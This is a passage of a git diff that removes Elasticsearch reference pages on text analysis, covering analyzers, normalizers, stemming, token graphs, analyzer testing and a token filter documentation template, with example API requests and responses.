"_shards": { - "total": 1, - "successful": 1, - "skipped" : 0, - "failed": 0 - }, - "hits": { - "total" : { - "value": 1, - "relation": "eq" - }, - "max_score": 0.2876821, - "hits": [ - { - "_index": "my-index-00001", - "_type": "_doc", - "_id": "1", - "_score": 0.2876821, - "_source": { - "text": "The fooBarBaz method" - }, - "highlight": { - "text": [ - "The fooBarBaz method" <1> - ] - } - } - ] - } -} ----------------------------- -// TESTRESPONSE[s/"took".*/"took": "$body.took",/] - -<1> Note the incorrect highlight. diff --git a/docs/reference/analysis/concepts.asciidoc b/docs/reference/analysis/concepts.asciidoc deleted file mode 100644 index 9ff605227b8..00000000000 --- a/docs/reference/analysis/concepts.asciidoc +++ /dev/null @@ -1,17 +0,0 @@ -[[analysis-concepts]] -== Text analysis concepts -++++ -Concepts -++++ - -This section explains the fundamental concepts of text analysis in {es}. - -* <> -* <> -* <> -* <> - -include::anatomy.asciidoc[] -include::index-search-time.asciidoc[] -include::stemming.asciidoc[] -include::token-graphs.asciidoc[] \ No newline at end of file diff --git a/docs/reference/analysis/configure-text-analysis.asciidoc b/docs/reference/analysis/configure-text-analysis.asciidoc deleted file mode 100644 index ddafc257e94..00000000000 --- a/docs/reference/analysis/configure-text-analysis.asciidoc +++ /dev/null @@ -1,32 +0,0 @@ -[[configure-text-analysis]] -== Configure text analysis - -By default, {es} uses the <> for -all text analysis. The `standard` analyzer gives you out-of-the-box support for -most natural languages and use cases. If you chose to use the `standard` -analyzer as-is, no further configuration is needed. - -If the standard analyzer does not fit your needs, review and test {es}'s other -built-in <>. Built-in analyzers don't -require configuration, but some support options that can be used to adjust their -behavior. For example, you can configure the `standard` analyzer with a list of -custom stop words to remove. - -If no built-in analyzer fits your needs, you can test and create a custom -analyzer. Custom analyzers involve selecting and combining different -<>, giving you greater control over -the process. - -* <> -* <> -* <> -* <> - - -include::testing.asciidoc[] - -include::analyzers/configuring.asciidoc[] - -include::analyzers/custom-analyzer.asciidoc[] - -include::specify-analyzer.asciidoc[] \ No newline at end of file diff --git a/docs/reference/analysis/index-search-time.asciidoc b/docs/reference/analysis/index-search-time.asciidoc deleted file mode 100644 index 41b922c2e95..00000000000 --- a/docs/reference/analysis/index-search-time.asciidoc +++ /dev/null @@ -1,175 +0,0 @@ -[[analysis-index-search-time]] -=== Index and search analysis - -Text analysis occurs at two times: - -Index time:: -When a document is indexed, any <> field values are analyzed. - -Search time:: -When running a <> on a `text` field, -the query string (the text the user is searching for) is analyzed. -+ -Search time is also called _query time_. - -The analyzer, or set of analysis rules, used at each time is called the _index -analyzer_ or _search analyzer_ respectively. - -[[analysis-same-index-search-analyzer]] -==== How the index and search analyzer work together - -In most cases, the same analyzer should be used at index and search time. This -ensures the values and query strings for a field are changed into the same form -of tokens. In turn, this ensures the tokens match as expected during a search. 
- -.**Example** -[%collapsible] -==== - -A document is indexed with the following value in a `text` field: - -[source,text] ------- -The QUICK brown foxes jumped over the dog! ------- - -The index analyzer for the field converts the value into tokens and normalizes -them. In this case, each of the tokens represents a word: - -[source,text] ------- -[ quick, brown, fox, jump, over, dog ] ------- - -These tokens are then indexed. - -Later, a user searches the same `text` field for: - -[source,text] ------- -"Quick fox" ------- - -The user expects this search to match the sentence indexed earlier, -`The QUICK brown foxes jumped over the dog!`. - -However, the query string does not contain the exact words used in the -document's original text: - -* `quick` vs `QUICK` -* `fox` vs `foxes` - -To account for this, the query string is analyzed using the same analyzer. This -analyzer produces the following tokens: - -[source,text] ------- -[ quick, fox ] ------- - -To execute the search, {es} compares these query string tokens to the tokens -indexed in the `text` field. - -[options="header"] -|=== -|Token | Query string | `text` field -|`quick` | X | X -|`brown` | | X -|`fox` | X | X -|`jump` | | X -|`over` | | X -|`dog` | | X -|=== - -Because the field value and query string were analyzed in the same way, they -created similar tokens. The tokens `quick` and `fox` are exact matches. This -means the search matches the document containing `"The QUICK brown foxes jumped -over the dog!"`, just as the user expects. -==== - -[[different-analyzers]] -==== When to use a different search analyzer - -While less common, it sometimes makes sense to use different analyzers at index -and search time. To enable this, {es} allows you to -<>. - -Generally, a separate search analyzer should only be specified when using the -same form of tokens for field values and query strings would create unexpected -or irrelevant search matches. - -[[different-analyzer-ex]] -.*Example* -[%collapsible] -==== -{es} is used to create a search engine that matches only words that start with -a provided prefix. For instance, a search for `tr` should return `tram` or -`trope`—but never `taxi` or `bat`. - -A document is added to the search engine's index; this document contains one -such word in a `text` field: - -[source,text] ------- -"Apple" ------- - -The index analyzer for the field converts the value into tokens and normalizes -them. In this case, each of the tokens represents a potential prefix for -the word: - -[source,text] ------- -[ a, ap, app, appl, apple] ------- - -These tokens are then indexed. - -Later, a user searches the same `text` field for: - -[source,text] ------- -"appli" ------- - -The user expects this search to match only words that start with `appli`, -such as `appliance` or `application`. The search should not match `apple`. - -However, if the index analyzer is used to analyze this query string, it would -produce the following tokens: - -[source,text] ------- -[ a, ap, app, appl, appli ] ------- - -When {es} compares these query string tokens to the ones indexed for `apple`, -it finds several matches. - -[options="header"] -|=== -|Token | `appli` | `apple` -|`a` | X | X -|`ap` | X | X -|`app` | X | X -|`appl` | X | X -|`appli` | | X -|=== - -This means the search would erroneously match `apple`. Not only that, it would -match any word starting with `a`. - -To fix this, you can specify a different search analyzer for query strings used -on the `text` field. 
- -In this case, you could specify a search analyzer that produces a single token -rather than a set of prefixes: - -[source,text] ------- -[ appli ] ------- - -This query string token would only match tokens for words that start with -`appli`, which better aligns with the user's search expectations. -==== diff --git a/docs/reference/analysis/normalizers.asciidoc b/docs/reference/analysis/normalizers.asciidoc deleted file mode 100644 index 6646ffb2bdd..00000000000 --- a/docs/reference/analysis/normalizers.asciidoc +++ /dev/null @@ -1,59 +0,0 @@ -[[analysis-normalizers]] -== Normalizers - -Normalizers are similar to analyzers except that they may only emit a single -token. As a consequence, they do not have a tokenizer and only accept a subset -of the available char filters and token filters. Only the filters that work on -a per-character basis are allowed. For instance a lowercasing filter would be -allowed, but not a stemming filter, which needs to look at the keyword as a -whole. The current list of filters that can be used in a normalizer is -following: `arabic_normalization`, `asciifolding`, `bengali_normalization`, -`cjk_width`, `decimal_digit`, `elision`, `german_normalization`, -`hindi_normalization`, `indic_normalization`, `lowercase`, -`persian_normalization`, `scandinavian_folding`, `serbian_normalization`, -`sorani_normalization`, `uppercase`. - -Elasticsearch ships with a `lowercase` built-in normalizer. For other forms of -normalization a custom configuration is required. - -[discrete] -=== Custom normalizers - -Custom normalizers take a list of -<> and a list of -<>. - -[source,console] --------------------------------- -PUT index -{ - "settings": { - "analysis": { - "char_filter": { - "quote": { - "type": "mapping", - "mappings": [ - "« => \"", - "» => \"" - ] - } - }, - "normalizer": { - "my_normalizer": { - "type": "custom", - "char_filter": ["quote"], - "filter": ["lowercase", "asciifolding"] - } - } - } - }, - "mappings": { - "properties": { - "foo": { - "type": "keyword", - "normalizer": "my_normalizer" - } - } - } -} --------------------------------- diff --git a/docs/reference/analysis/overview.asciidoc b/docs/reference/analysis/overview.asciidoc deleted file mode 100644 index 8cf5a10ae8a..00000000000 --- a/docs/reference/analysis/overview.asciidoc +++ /dev/null @@ -1,78 +0,0 @@ -[[analysis-overview]] -== Text analysis overview -++++ -Overview -++++ - -Text analysis enables {es} to perform full-text search, where the search returns -all _relevant_ results rather than just exact matches. - -If you search for `Quick fox jumps`, you probably want the document that -contains `A quick brown fox jumps over the lazy dog`, and you might also want -documents that contain related words like `fast fox` or `foxes leap`. - -[discrete] -[[tokenization]] -=== Tokenization - -Analysis makes full-text search possible through _tokenization_: breaking a text -down into smaller chunks, called _tokens_. In most cases, these tokens are -individual words. - -If you index the phrase `the quick brown fox jumps` as a single string and the -user searches for `quick fox`, it isn't considered a match. However, if you -tokenize the phrase and index each word separately, the terms in the query -string can be looked up individually. This means they can be matched by searches -for `quick fox`, `fox brown`, or other variations. - -[discrete] -[[normalization]] -=== Normalization - -Tokenization enables matching on individual terms, but each token is still -matched literally. 
This means: - -* A search for `Quick` would not match `quick`, even though you likely want -either term to match the other - -* Although `fox` and `foxes` share the same root word, a search for `foxes` -would not match `fox` or vice versa. - -* A search for `jumps` would not match `leaps`. While they don't share a root -word, they are synonyms and have a similar meaning. - -To solve these problems, text analysis can _normalize_ these tokens into a -standard format. This allows you to match tokens that are not exactly the same -as the search terms, but similar enough to still be relevant. For example: - -* `Quick` can be lowercased: `quick`. - -* `foxes` can be _stemmed_, or reduced to its root word: `fox`. - -* `jump` and `leap` are synonyms and can be indexed as a single word: `jump`. - -To ensure search terms match these words as intended, you can apply the same -tokenization and normalization rules to the query string. For example, a search -for `Foxes leap` can be normalized to a search for `fox jump`. - -[discrete] -[[analysis-customization]] -=== Customize text analysis - -Text analysis is performed by an <>, a set of rules -that govern the entire process. - -{es} includes a default analyzer, called the -<>, which works well for most use -cases right out of the box. - -If you want to tailor your search experience, you can choose a different -<> or even -<>. A custom analyzer gives you -control over each step of the analysis process, including: - -* Changes to the text _before_ tokenization - -* How text is converted to tokens - -* Normalization changes made to tokens before indexing or search \ No newline at end of file diff --git a/docs/reference/analysis/specify-analyzer.asciidoc b/docs/reference/analysis/specify-analyzer.asciidoc deleted file mode 100644 index d3114a74984..00000000000 --- a/docs/reference/analysis/specify-analyzer.asciidoc +++ /dev/null @@ -1,202 +0,0 @@ -[[specify-analyzer]] -=== Specify an analyzer - -{es} offers a variety of ways to specify built-in or custom analyzers: - -* By `text` field, index, or query -* For <> - -[TIP] -.Keep it simple -==== -The flexibility to specify analyzers at different levels and for different times -is great... _but only when it's needed_. - -In most cases, a simple approach works best: Specify an analyzer for each -`text` field, as outlined in <>. - -This approach works well with {es}'s default behavior, letting you use the same -analyzer for indexing and search. It also lets you quickly see which analyzer -applies to which field using the <>. - -If you don't typically create mappings for your indices, you can use -<> to achieve a similar effect. -==== - -[[specify-index-time-analyzer]] -==== How {es} determines the index analyzer - -{es} determines which index analyzer to use by checking the following parameters -in order: - -. The <> mapping parameter for the field. - See <>. -. The `analysis.analyzer.default` index setting. - See <>. - -If none of these parameters are specified, the -<> is used. - -[[specify-index-field-analyzer]] -==== Specify the analyzer for a field - -When mapping an index, you can use the <> mapping parameter -to specify an analyzer for each `text` field. - -The following <> request sets the -`whitespace` analyzer as the analyzer for the `title` field. 
- -[source,console] ----- -PUT my-index-000001 -{ - "mappings": { - "properties": { - "title": { - "type": "text", - "analyzer": "whitespace" - } - } - } -} ----- - -[[specify-index-time-default-analyzer]] -==== Specify the default analyzer for an index - -In addition to a field-level analyzer, you can set a fallback analyzer for -using the `analysis.analyzer.default` setting. - -The following <> request sets the -`simple` analyzer as the fallback analyzer for `my-index-000001`. - -[source,console] ----- -PUT my-index-000001 -{ - "settings": { - "analysis": { - "analyzer": { - "default": { - "type": "simple" - } - } - } - } -} ----- - -[[specify-search-analyzer]] -==== How {es} determines the search analyzer - -// tag::search-analyzer-warning[] -[WARNING] -==== -In most cases, specifying a different search analyzer is unnecessary. Doing so -could negatively impact relevancy and result in unexpected search results. - -If you choose to specify a separate search analyzer, we recommend you thoroughly -<> before deploying in -production. -==== -// end::search-analyzer-warning[] - -At search time, {es} determines which analyzer to use by checking the following -parameters in order: - -. The <> parameter in the search query. - See <>. -. The <> mapping parameter for the field. - See <>. -. The `analysis.analyzer.default_search` index setting. - See <>. -. The <> mapping parameter for the field. - See <>. - -If none of these parameters are specified, the -<> is used. - -[[specify-search-query-analyzer]] -==== Specify the search analyzer for a query - -When writing a <>, you can use the `analyzer` -parameter to specify a search analyzer. If provided, this overrides any other -search analyzers. - -The following <> request sets the `stop` analyzer as -the search analyzer for a <> query. - -[source,console] ----- -GET my-index-000001/_search -{ - "query": { - "match": { - "message": { - "query": "Quick foxes", - "analyzer": "stop" - } - } - } -} ----- -// TEST[s/^/PUT my-index-000001\n/] - -[[specify-search-field-analyzer]] -==== Specify the search analyzer for a field - -When mapping an index, you can use the <> mapping -parameter to specify a search analyzer for each `text` field. - -If a search analyzer is provided, the index analyzer must also be specified -using the `analyzer` parameter. - -The following <> request sets the -`simple` analyzer as the search analyzer for the `title` field. - -[source,console] ----- -PUT my-index-000001 -{ - "mappings": { - "properties": { - "title": { - "type": "text", - "analyzer": "whitespace", - "search_analyzer": "simple" - } - } - } -} ----- - -[[specify-search-default-analyzer]] -==== Specify the default search analyzer for an index - -When <>, you can set a default search -analyzer using the `analysis.analyzer.default_search` setting. - -If a search analyzer is provided, a default index analyzer must also be -specified using the `analysis.analyzer.default` setting. - -The following <> request sets the -`whitespace` analyzer as the default search analyzer for the `my-index-000001` index. 
- -[source,console] ----- -PUT my-index-000001 -{ - "settings": { - "analysis": { - "analyzer": { - "default": { - "type": "simple" - }, - "default_search": { - "type": "whitespace" - } - } - } - } -} ----- diff --git a/docs/reference/analysis/stemming.asciidoc b/docs/reference/analysis/stemming.asciidoc deleted file mode 100644 index c590152d2df..00000000000 --- a/docs/reference/analysis/stemming.asciidoc +++ /dev/null @@ -1,125 +0,0 @@ -[[stemming]] -=== Stemming - -_Stemming_ is the process of reducing a word to its root form. This ensures -variants of a word match during a search. - -For example, `walking` and `walked` can be stemmed to the same root word: -`walk`. Once stemmed, an occurrence of either word would match the other in a -search. - -Stemming is language-dependent but often involves removing prefixes and -suffixes from words. - -In some cases, the root form of a stemmed word may not be a real word. For -example, `jumping` and `jumpiness` can both be stemmed to `jumpi`. While `jumpi` -isn't a real English word, it doesn't matter for search; if all variants of a -word are reduced to the same root form, they will match correctly. - -[[stemmer-token-filters]] -==== Stemmer token filters - -In {es}, stemming is handled by stemmer <>. These token filters can be categorized based on how they stem words: - -* <>, which stem words based on a set -of rules -* <>, which stem words by looking them -up in a dictionary - -Because stemming changes tokens, we recommend using the same stemmer token -filters during <>. - -[[algorithmic-stemmers]] -==== Algorithmic stemmers - -Algorithmic stemmers apply a series of rules to each word to reduce it to its -root form. For example, an algorithmic stemmer for English may remove the `-s` -and `-es` prefixes from the end of plural words. - -Algorithmic stemmers have a few advantages: - -* They require little setup and usually work well out of the box. -* They use little memory. -* They are typically faster than <>. - -However, most algorithmic stemmers only alter the existing text of a word. This -means they may not work well with irregular words that don't contain their root -form, such as: - -* `be`, `are`, and `am` -* `mouse` and `mice` -* `foot` and `feet` - -The following token filters use algorithmic stemming: - -* <>, which provides algorithmic -stemming for several languages, some with additional variants. -* <>, a stemmer for English that combines -algorithmic stemming with a built-in dictionary. -* <>, our recommended algorithmic -stemmer for English. -* <>, which uses -https://snowballstem.org/[Snowball]-based stemming rules for several -languages. - -[[dictionary-stemmers]] -==== Dictionary stemmers - -Dictionary stemmers look up words in a provided dictionary, replacing unstemmed -word variants with stemmed words from the dictionary. - -In theory, dictionary stemmers are well suited for: - -* Stemming irregular words -* Discerning between words that are spelled similarly but not related -conceptually, such as: -** `organ` and `organization` -** `broker` and `broken` - -In practice, algorithmic stemmers typically outperform dictionary stemmers. This -is because dictionary stemmers have the following disadvantages: - -* *Dictionary quality* + -A dictionary stemmer is only as good as its dictionary. To work well, these -dictionaries must include a significant number of words, be updated regularly, -and change with language trends. 
Often, by the time a dictionary has been made -available, it's incomplete and some of its entries are already outdated. - -* *Size and performance* + -Dictionary stemmers must load all words, prefixes, and suffixes from its -dictionary into memory. This can use a significant amount of RAM. Low-quality -dictionaries may also be less efficient with prefix and suffix removal, which -can slow the stemming process significantly. - -You can use the <> token filter to -perform dictionary stemming. - -[TIP] -==== -If available, we recommend trying an algorithmic stemmer for your language -before using the <> token filter. -==== - -[[control-stemming]] -==== Control stemming - -Sometimes stemming can produce shared root words that are spelled similarly but -not related conceptually. For example, a stemmer may reduce both `skies` and -`skiing` to the same root word: `ski`. - -To prevent this and better control stemming, you can use the following token -filters: - -* <>, which lets you -define rules for stemming specific tokens. -* <>, which marks -specified tokens as keywords. Keyword tokens are not stemmed by subsequent -stemmer token filters. -* <>, which can be used to mark -tokens as keywords, similar to the `keyword_marker` filter. - - -For built-in <>, you also can use the -<<_excluding_words_from_stemming,`stem_exclusion`>> parameter to specify a list -of words that won't be stemmed. diff --git a/docs/reference/analysis/testing.asciidoc b/docs/reference/analysis/testing.asciidoc deleted file mode 100644 index a430fb18a05..00000000000 --- a/docs/reference/analysis/testing.asciidoc +++ /dev/null @@ -1,207 +0,0 @@ -[[test-analyzer]] -=== Test an analyzer - -The <> is an invaluable tool for viewing the -terms produced by an analyzer. A built-in analyzer can be specified inline in -the request: - -[source,console] -------------------------------------- -POST _analyze -{ - "analyzer": "whitespace", - "text": "The quick brown fox." -} -------------------------------------- - -The API returns the following response: - -[source,console-result] -------------------------------------- -{ - "tokens": [ - { - "token": "The", - "start_offset": 0, - "end_offset": 3, - "type": "word", - "position": 0 - }, - { - "token": "quick", - "start_offset": 4, - "end_offset": 9, - "type": "word", - "position": 1 - }, - { - "token": "brown", - "start_offset": 10, - "end_offset": 15, - "type": "word", - "position": 2 - }, - { - "token": "fox.", - "start_offset": 16, - "end_offset": 20, - "type": "word", - "position": 3 - } - ] -} -------------------------------------- - -You can also test combinations of: - -* A tokenizer -* Zero or more token filters -* Zero or more character filters - -[source,console] -------------------------------------- -POST _analyze -{ - "tokenizer": "standard", - "filter": [ "lowercase", "asciifolding" ], - "text": "Is this déja vu?" 
-} -------------------------------------- - -The API returns the following response: - -[source,console-result] -------------------------------------- -{ - "tokens": [ - { - "token": "is", - "start_offset": 0, - "end_offset": 2, - "type": "", - "position": 0 - }, - { - "token": "this", - "start_offset": 3, - "end_offset": 7, - "type": "", - "position": 1 - }, - { - "token": "deja", - "start_offset": 8, - "end_offset": 12, - "type": "", - "position": 2 - }, - { - "token": "vu", - "start_offset": 13, - "end_offset": 15, - "type": "", - "position": 3 - } - ] -} -------------------------------------- - -.Positions and character offsets -********************************************************* - -As can be seen from the output of the `analyze` API, analyzers not only -convert words into terms, they also record the order or relative _positions_ -of each term (used for phrase queries or word proximity queries), and the -start and end _character offsets_ of each term in the original text (used for -highlighting search snippets). - -********************************************************* - - -Alternatively, a <> can be -referred to when running the `analyze` API on a specific index: - -[source,console] -------------------------------------- -PUT my-index-000001 -{ - "settings": { - "analysis": { - "analyzer": { - "std_folded": { <1> - "type": "custom", - "tokenizer": "standard", - "filter": [ - "lowercase", - "asciifolding" - ] - } - } - } - }, - "mappings": { - "properties": { - "my_text": { - "type": "text", - "analyzer": "std_folded" <2> - } - } - } -} - -GET my-index-000001/_analyze <3> -{ - "analyzer": "std_folded", <4> - "text": "Is this déjà vu?" -} - -GET my-index-000001/_analyze <3> -{ - "field": "my_text", <5> - "text": "Is this déjà vu?" -} -------------------------------------- - -The API returns the following response: - -[source,console-result] -------------------------------------- -{ - "tokens": [ - { - "token": "is", - "start_offset": 0, - "end_offset": 2, - "type": "", - "position": 0 - }, - { - "token": "this", - "start_offset": 3, - "end_offset": 7, - "type": "", - "position": 1 - }, - { - "token": "deja", - "start_offset": 8, - "end_offset": 12, - "type": "", - "position": 2 - }, - { - "token": "vu", - "start_offset": 13, - "end_offset": 15, - "type": "", - "position": 3 - } - ] -} -------------------------------------- - -<1> Define a `custom` analyzer called `std_folded`. -<2> The field `my_text` uses the `std_folded` analyzer. -<3> To refer to this analyzer, the `analyze` API must specify the index name. -<4> Refer to the analyzer by name. -<5> Refer to the analyzer used by field `my_text`. diff --git a/docs/reference/analysis/token-graphs.asciidoc b/docs/reference/analysis/token-graphs.asciidoc deleted file mode 100644 index 20f91891aed..00000000000 --- a/docs/reference/analysis/token-graphs.asciidoc +++ /dev/null @@ -1,104 +0,0 @@ -[[token-graphs]] -=== Token graphs - -When a <> converts a text into a stream of -tokens, it also records the following: - -* The `position` of each token in the stream -* The `positionLength`, the number of positions that a token spans - -Using these, you can create a -{wikipedia}/Directed_acyclic_graph[directed acyclic graph], -called a _token graph_, for a stream. In a token graph, each position represents -a node. Each token represents an edge or arc, pointing to the next position. 
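-
-You can see both attributes in the output of the `_analyze` API. The following
-sketch is an illustration only; it assumes the `synonym_graph` token filter,
-configured inline with a single synonym rule:
-
-[source,console]
------
-GET /_analyze
-{
-  "tokenizer": "whitespace",
-  "filter": [
-    {
-      "type": "synonym_graph",
-      "synonyms": [ "dns, domain name system" ]
-    }
-  ],
-  "text": "domain name system is fragile"
-}
------
-
-In the response, `dns` is emitted at position `0` with a `positionLength` of
-`3`, while the other tokens report only a `position` because their
-`positionLength` defaults to `1`.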
- -image::images/analysis/token-graph-qbf-ex.svg[align="center"] - -[[token-graphs-synonyms]] -==== Synonyms - -Some <> can add new tokens, like -synonyms, to an existing token stream. These synonyms often span the same -positions as existing tokens. - -In the following graph, `quick` and its synonym `fast` both have a position of -`0`. They span the same positions. - -image::images/analysis/token-graph-qbf-synonym-ex.svg[align="center"] - -[[token-graphs-multi-position-tokens]] -==== Multi-position tokens - -Some token filters can add tokens that span multiple positions. These can -include tokens for multi-word synonyms, such as using "atm" as a synonym for -"automatic teller machine." - -However, only some token filters, known as _graph token filters_, accurately -record the `positionLength` for multi-position tokens. This filters include: - -* <> -* <> - -In the following graph, `domain name system` and its synonym, `dns`, both have a -position of `0`. However, `dns` has a `positionLength` of `3`. Other tokens in -the graph have a default `positionLength` of `1`. - -image::images/analysis/token-graph-dns-synonym-ex.svg[align="center"] - -[[token-graphs-token-graphs-search]] -===== Using token graphs for search - -<> ignores the `positionLength` attribute -and does not support token graphs containing multi-position tokens. - -However, queries, such as the <> or -<> query, can use these graphs to -generate multiple sub-queries from a single query string. - -.*Example* -[%collapsible] -==== - -A user runs a search for the following phrase using the `match_phrase` query: - -`domain name system is fragile` - -During <>, `dns`, a synonym for -`domain name system`, is added to the query string's token stream. The `dns` -token has a `positionLength` of `3`. - -image::images/analysis/token-graph-dns-synonym-ex.svg[align="center"] - -The `match_phrase` query uses this graph to generate sub-queries for the -following phrases: - -[source,text] ------- -dns is fragile -domain name system is fragile ------- - -This means the query matches documents containing either `dns is fragile` _or_ -`domain name system is fragile`. -==== - -[[token-graphs-invalid-token-graphs]] -===== Invalid token graphs - -The following token filters can add tokens that span multiple positions but -only record a default `positionLength` of `1`: - -* <> -* <> - -This means these filters will produce invalid token graphs for streams -containing such tokens. - -In the following graph, `dns` is a multi-position synonym for `domain name -system`. However, `dns` has the default `positionLength` value of `1`, resulting -in an invalid graph. - -image::images/analysis/token-graph-dns-invalid-ex.svg[align="center"] - -Avoid using invalid token graphs for search. Invalid graphs can cause unexpected -search results. \ No newline at end of file diff --git a/docs/reference/analysis/tokenfilters.asciidoc b/docs/reference/analysis/tokenfilters.asciidoc deleted file mode 100644 index 46cd0347b72..00000000000 --- a/docs/reference/analysis/tokenfilters.asciidoc +++ /dev/null @@ -1,107 +0,0 @@ -[[analysis-tokenfilters]] -== Token filter reference - -Token filters accept a stream of tokens from a -<> and can modify tokens -(eg lowercasing), delete tokens (eg remove stopwords) -or add tokens (eg synonyms). - -{es} has a number of built-in token filters you can use -to build <>. 
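-
-For example, a single `_analyze` request can chain filters that modify, delete,
-and add tokens. The following sketch is an illustration only; it assumes the
-`lowercase`, `stop`, and `synonym` filters, with an inline synonym rule:
-
-[source,console]
------
-GET /_analyze
-{
-  "tokenizer": "standard",
-  "filter": [
-    "lowercase",
-    "stop",
-    {
-      "type": "synonym",
-      "synonyms": [ "quick, fast" ]
-    }
-  ],
-  "text": "The QUICK brown fox"
-}
------
-
-Here `lowercase` rewrites `QUICK` to `quick`, `stop` removes `the`, and
-`synonym` adds `fast` at the same position as `quick`.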
- - -include::tokenfilters/apostrophe-tokenfilter.asciidoc[] - -include::tokenfilters/asciifolding-tokenfilter.asciidoc[] - -include::tokenfilters/cjk-bigram-tokenfilter.asciidoc[] - -include::tokenfilters/cjk-width-tokenfilter.asciidoc[] - -include::tokenfilters/classic-tokenfilter.asciidoc[] - -include::tokenfilters/common-grams-tokenfilter.asciidoc[] - -include::tokenfilters/condition-tokenfilter.asciidoc[] - -include::tokenfilters/decimal-digit-tokenfilter.asciidoc[] - -include::tokenfilters/delimited-payload-tokenfilter.asciidoc[] - -include::tokenfilters/dictionary-decompounder-tokenfilter.asciidoc[] - -include::tokenfilters/edgengram-tokenfilter.asciidoc[] - -include::tokenfilters/elision-tokenfilter.asciidoc[] - -include::tokenfilters/fingerprint-tokenfilter.asciidoc[] - -include::tokenfilters/flatten-graph-tokenfilter.asciidoc[] - -include::tokenfilters/hunspell-tokenfilter.asciidoc[] - -include::tokenfilters/hyphenation-decompounder-tokenfilter.asciidoc[] - -include::tokenfilters/keep-types-tokenfilter.asciidoc[] - -include::tokenfilters/keep-words-tokenfilter.asciidoc[] - -include::tokenfilters/keyword-marker-tokenfilter.asciidoc[] - -include::tokenfilters/keyword-repeat-tokenfilter.asciidoc[] - -include::tokenfilters/kstem-tokenfilter.asciidoc[] - -include::tokenfilters/length-tokenfilter.asciidoc[] - -include::tokenfilters/limit-token-count-tokenfilter.asciidoc[] - -include::tokenfilters/lowercase-tokenfilter.asciidoc[] - -include::tokenfilters/minhash-tokenfilter.asciidoc[] - -include::tokenfilters/multiplexer-tokenfilter.asciidoc[] - -include::tokenfilters/ngram-tokenfilter.asciidoc[] - -include::tokenfilters/normalization-tokenfilter.asciidoc[] - -include::tokenfilters/pattern-capture-tokenfilter.asciidoc[] - -include::tokenfilters/pattern_replace-tokenfilter.asciidoc[] - -include::tokenfilters/phonetic-tokenfilter.asciidoc[] - -include::tokenfilters/porterstem-tokenfilter.asciidoc[] - -include::tokenfilters/predicate-tokenfilter.asciidoc[] - -include::tokenfilters/remove-duplicates-tokenfilter.asciidoc[] - -include::tokenfilters/reverse-tokenfilter.asciidoc[] - -include::tokenfilters/shingle-tokenfilter.asciidoc[] - -include::tokenfilters/snowball-tokenfilter.asciidoc[] - -include::tokenfilters/stemmer-tokenfilter.asciidoc[] - -include::tokenfilters/stemmer-override-tokenfilter.asciidoc[] - -include::tokenfilters/stop-tokenfilter.asciidoc[] - -include::tokenfilters/synonym-tokenfilter.asciidoc[] - -include::tokenfilters/synonym-graph-tokenfilter.asciidoc[] - -include::tokenfilters/trim-tokenfilter.asciidoc[] - -include::tokenfilters/truncate-tokenfilter.asciidoc[] - -include::tokenfilters/unique-tokenfilter.asciidoc[] - -include::tokenfilters/uppercase-tokenfilter.asciidoc[] - -include::tokenfilters/word-delimiter-tokenfilter.asciidoc[] - -include::tokenfilters/word-delimiter-graph-tokenfilter.asciidoc[] diff --git a/docs/reference/analysis/tokenfilters/_token-filter-template.asciidoc b/docs/reference/analysis/tokenfilters/_token-filter-template.asciidoc deleted file mode 100644 index c2558d0b91b..00000000000 --- a/docs/reference/analysis/tokenfilters/_token-filter-template.asciidoc +++ /dev/null @@ -1,233 +0,0 @@ -//// -This is a template for token filter reference documentation. - -To document a new token filter, copy this file, remove comments like this, and -replace "sample" with the appropriate filter name. 
- -Ensure the new filter docs are linked and included in -docs/reference/analysis/tokefilters.asciidoc -//// - -[[sample-tokenfilter]] -=== Sample token filter -++++ -Sample -++++ - -//// -INTRO -Include a brief, 1-2 sentence description. -If based on a Lucene token filter, link to the Lucene documentation. -//// - -Does a cool thing. For example, the `sample` filter changes `x` to `y`. - -The filter uses Lucene's -{lucene-analysis-docs}/sampleFilter.html[SampleFilter]. - -[[analysis-sample-tokenfilter-analyze-ex]] -==== Example -//// -Basic example of the filter's input and output token streams. - -Guidelines -*************************************** -* The _analyze API response should be included but commented out. -* Ensure // TEST[skip:...] comments are removed. -*************************************** -//// - -The following <> request uses the `sample` -filter to do a cool thing to `the quick fox jumps the lazy dog`: - -[source,console] ----- -GET /_analyze -{ - "tokenizer" : "standard", - "filter" : ["sample"], - "text" : "the quick fox jumps the lazy dog" -} ----- -// TEST[skip: REMOVE THIS COMMENT.] - -The filter produces the following tokens: - -[source,text] ----- -[ the, quick, fox, jumps, the, lazy, dog ] ----- - -//// -[source,console-result] ----- -{ - "tokens" : [ - { - "token" : "the", - "start_offset" : 0, - "end_offset" : 3, - "type" : "", - "position" : 0 - }, - { - "token" : "quick", - "start_offset" : 4, - "end_offset" : 9, - "type" : "", - "position" : 1 - }, - { - "token" : "fox", - "start_offset" : 10, - "end_offset" : 13, - "type" : "", - "position" : 2 - }, - { - "token" : "jumps", - "start_offset" : 14, - "end_offset" : 19, - "type" : "", - "position" : 3 - }, - { - "token" : "over", - "start_offset" : 20, - "end_offset" : 24, - "type" : "", - "position" : 4 - }, - { - "token" : "the", - "start_offset" : 25, - "end_offset" : 28, - "type" : "", - "position" : 5 - }, - { - "token" : "lazy", - "start_offset" : 29, - "end_offset" : 33, - "type" : "", - "position" : 6 - }, - { - "token" : "dog", - "start_offset" : 34, - "end_offset" : 37, - "type" : "", - "position" : 7 - } - ] -} ----- -// TEST[skip: REMOVE THIS COMMENT.] -//// - -[[analysis-sample-tokenfilter-analyzer-ex]] -==== Add to an analyzer -//// -Example of how to add a pre-configured token filter to an analyzer. -If the filter requires arguments, skip this section. - -Guidelines -*************************************** -* If needed, change the tokenizer so the example fits the filter. -* Ensure // TEST[skip:...] comments are removed. -*************************************** -//// - -The following <> request uses the -`sample` filter to configure a new <>. - -[source,console] ----- -PUT sample_example -{ - "settings": { - "analysis": { - "analyzer": { - "my_sample_analyzer": { - "tokenizer": "standard", - "filter": [ "sample" ] - } - } - } - } -} ----- -// TEST[skip: REMOVE THIS COMMENT.] - - -[[analysis-sample-tokenfilter-configure-parms]] -==== Configurable parameters -//// -Documents each parameter for the token filter. -If the filter does not have any configurable parameters, skip this section. - -Guidelines -*************************************** -* Use a definition list. -* End each definition with a period. -* Include whether the parameter is Optional or Required and the data type. -* Include default values as the last sentence of the first paragraph. -* Include a range of valid values, if applicable. -* If the parameter requires a specific delimiter for multiple values, say so. 
